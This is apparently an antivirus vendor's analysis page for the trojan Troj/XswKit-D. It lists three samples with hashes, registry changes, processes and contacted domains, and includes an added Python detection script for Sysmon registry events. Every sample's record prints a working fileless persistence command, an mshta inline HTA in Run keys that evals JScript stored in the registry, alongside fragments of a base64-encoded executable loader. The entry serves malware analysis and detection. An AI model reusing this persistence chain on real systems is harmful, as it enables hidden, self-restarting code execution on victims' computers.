Troj/XswKit-D

Category: Viruses and spyware
Protection available since: 19 Feb 2015 21:08:10 (GMT)
Type: Trojan
Last updated: 25 May 2015 23:45:17 (GMT)
Prevalence:


Examples of Troj/XswKit-D include:

Example 1

File Information

Size
248K
SHA-1
09a8629f0ae69ca115635950bf5ba0b63b98d42e
MD5
ed8ef781eed9d6fdc9208948ec3b0037
CRC-32
00a79571
File type
Windows executable
First seen
2015-02-19

Runtime Analysis

Registry Keys Created
  • HKCU\Software\ xsw
    loader
    (JScript, recorded with only every second character legible. What can still be read back: `var … = this;`, a Scripting.FileSystemObject and a WScript.Shell obtained via `new ActiveXObject(...)`, a directory taken from `ExpandEnvironmentStrings("%…%\\")` (apparently `%TMP%`), a variable holding the same `about:<title></title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>` string that appears in the Run value under this example, and a base64 string beginning `TVqQAAMAAAAEAAAA//8AA`, the base64 encoding of an MZ/PE header. The 7086-character middle of the value is not reproduced on this page.)
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-20\Software\ xsw
    loader
    (same loader value as under HKCU\Software\ xsw above)
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-19\Software\ xsw
    loader
    (same loader value as under HKCU\Software\ xsw above)
  • HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\ xsw
    loader
    (same loader value as under HKCU\Software\ xsw above)
  • HKEY_USERS\.DEFAULT\Software\ xsw
    loader
    (same loader value as under HKCU\Software\ xsw above)
Processes Created
  • c:\windows\system32\svchost.exe
HTTP Requests
  • http://-\x80L\x01\x03
DNS Requests
  • eurekafuntime.net
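The Run-key entries above describe a fileless persistence chain: a value named `rundll32` actually launches `mshta` with an inline `about:` HTA, whose script `eval`s JScript read back out of `HKCU\Software\ xsw\loader`, and that JScript carries a base64-encoded PE. The Python below is an added hunting example, not Sophos's code and not part of this analysis: it applies the checks a detection engineer would put on Sysmon Event ID 13 (registry value set) telemetry to three constructed records, two modelled on the behaviour above and one benign. The field names, the `LOLBINS` set and the rule names are this example's own choices.

```python
import re

# Constructed Sysmon-style "registry value set" events (Event ID 13), cut
# down to the three fields the checks use. The first two are modelled on
# the Troj/XswKit-D Run/loader pair documented above; the third is benign.
SAMPLE_EVENTS = [
    {
        "key": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run",
        "value": "rundll32",
        "data": (
            'mshta "about:<title></title><script>moveTo(-300,-300);resizeTo(0,0);'
            "</script><hta:application showintaskbar=no><script>eval(new ActiveXObject"
            "('WScript.Shell').RegRead('HKCU\\\\Software\\\\ xsw\\\\loader'));</script>\""
        ),
    },
    {
        "key": r"HKU\S-1-5-21-1111\Software\ xsw",
        "value": "loader",
        "data": (
            'var WshShell = new ActiveXObject("WScript.Shell"); '
            'var pe = "TVqQAAMAAAAEAAAA//8AALgAAAAA"; /* base64 MZ header, truncated */'
        ),
    },
    {
        "key": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run",
        "value": "OneDrive",
        "data": r'"C:\Users\me\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
]

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
# mshta started with an inline URI scheme rather than an .hta file on disk
INLINE_MSHTA = re.compile(
    r'^\s*"?(?:[^"\s\\]*\\)*mshta(?:\.exe)?"?\s+"?(?:about|javascript|vbscript):', re.I
)
REGREAD = re.compile(r"RegRead\(\s*(['\"])(.+?)\1", re.I)
FIRST_TOKEN = re.compile(r'^\s*"?([^"\s]+?)"?(?:\s|$)')
# value names that imitate a Windows binary; flag when the command runs something else
LOLBINS = {"rundll32", "regsvr32", "mshta", "wscript", "cscript", "svchost", "explorer"}
B64_MZ = "TVqQ"  # base64 of the bytes "MZ\x90\x00" that open a PE file


def regread_targets(data):
    """Registry paths an inline script reads code from, with JS string escaping undone."""
    return [m.group(2).replace("\\\\", "\\") for m in REGREAD.finditer(data)]


def launched_exe(data):
    """Base name (no path, no .exe) of the program a Run value actually starts."""
    m = FIRST_TOKEN.match(data)
    if not m:
        return ""
    name = m.group(1).rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def check_event(evt):
    """Names of the rules the event trips; empty list when nothing matches."""
    key, value, data = evt["key"], evt["value"], evt["data"]
    hits = []
    if RUN_KEY.search(key):
        if INLINE_MSHTA.search(data):
            hits.append("run_key_inline_mshta")
        if regread_targets(data) and re.search(r"\beval\s*\(", data):
            hits.append("run_key_evals_registry_value")
        exe = launched_exe(data)
        if value.lower() in LOLBINS and exe and exe != value.lower():
            hits.append("value_name_masquerade")
    if B64_MZ in data:
        hits.append("base64_pe_in_registry")
    return hits


def scan(events):
    """(key, value, hits) for every event that tripped at least one rule."""
    results = []
    for evt in events:
        hits = check_event(evt)
        if hits:
            results.append((evt["key"], evt["value"], hits))
    return results


if __name__ == "__main__":
    for key, value, hits in scan(SAMPLE_EVENTS):
        print(f"{key}\\{value}: {', '.join(hits)}")
```

`regread_targets` gives the pivot from the Run value to the registry path that holds the real payload, which is what an analyst needs to export before cleaning the Run entries. Note that the sample writes the same pair under HKCU and under HKEY_USERS\S-1-5-18, S-1-5-19, S-1-5-20 and .DEFAULT, so a live hunt should enumerate every hive under HKEY_USERS rather than only the interactive user's HKCU.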

Example 2

File Information

Size
307K
SHA-1
0a24d6c22ee4c99a374eb821eca1ddd76f55093f
MD5
897b6634e9fb1651248306649c91eb44
CRC-32
f7fa6071
File type
Windows executable
First seen
2015-02-28

Runtime Analysis

Registry Keys Created
  • HKEY_USERS\S-1-5-20\Software\ xsw
    loader
    (JScript, recorded with only every second character legible. What can still be read back: `var … = this;`, a Scripting.FileSystemObject and a WScript.Shell obtained via `new ActiveXObject(...)`, a directory taken from `ExpandEnvironmentStrings("%…%\\")` (apparently `%TMP%`), a variable holding the same `about:<title></title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>` string that appears in the Run value under this example, and a base64 string beginning `TVqQAAMAAAAEAAAA//8AA`, the base64 encoding of an MZ/PE header. The 7086-character middle of the value is not reproduced on this page.)
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
  • HKEY_USERS\S-1-5-19\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
  • HKCU\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\.DEFAULT\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
Processes Created
  • c:\windows\system32\svchost.exe
HTTP Requests
  • http://-\x80L\x01\x03
DNS Requests
  • flashkoos.com

Example 3

File Information

Size
270K
SHA-1
0c4fc0d60793d93f1774cf1611eda9e1187fde3c
MD5
94ee6b6b34db07158ac03bf62cc90536
CRC-32
e2e98ebb
File type
Windows executable
First seen
2007-10-17

Runtime Analysis

Registry Keys Created
  • HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-20\Software\ xsw
    loader
    (JScript, recorded with only every second character legible. What can still be read back: `var … = this;`, a Scripting.FileSystemObject and a WScript.Shell obtained via `new ActiveXObject(...)`, a directory taken from `ExpandEnvironmentStrings("%…%\\")` (apparently `%TMP%`), a variable holding the same `about:<title></title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>` string that appears in the Run value under this example, and a base64 string beginning `TVqQAAMAAAAEAAAA//8AA`, the base64 encoding of an MZ/PE header. The 7086-character middle of the value is not reproduced on this page.)
  • HKCU\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
  • HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-18\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
  • HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\S-1-5-19\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
  • HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
    rundll32
    mshta "about:<title>□</title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));</script>"
  • HKEY_USERS\.DEFAULT\Software\ xsw
    loader
    (same loader value as under HKEY_USERS\S-1-5-20\Software\ xsw above)
Processes Created
  • c:\windows\system32\svchost.exe
HTTP Requests
  • http://-\x80L\x01\x03
DNS Requests
  • eurekafuntime.net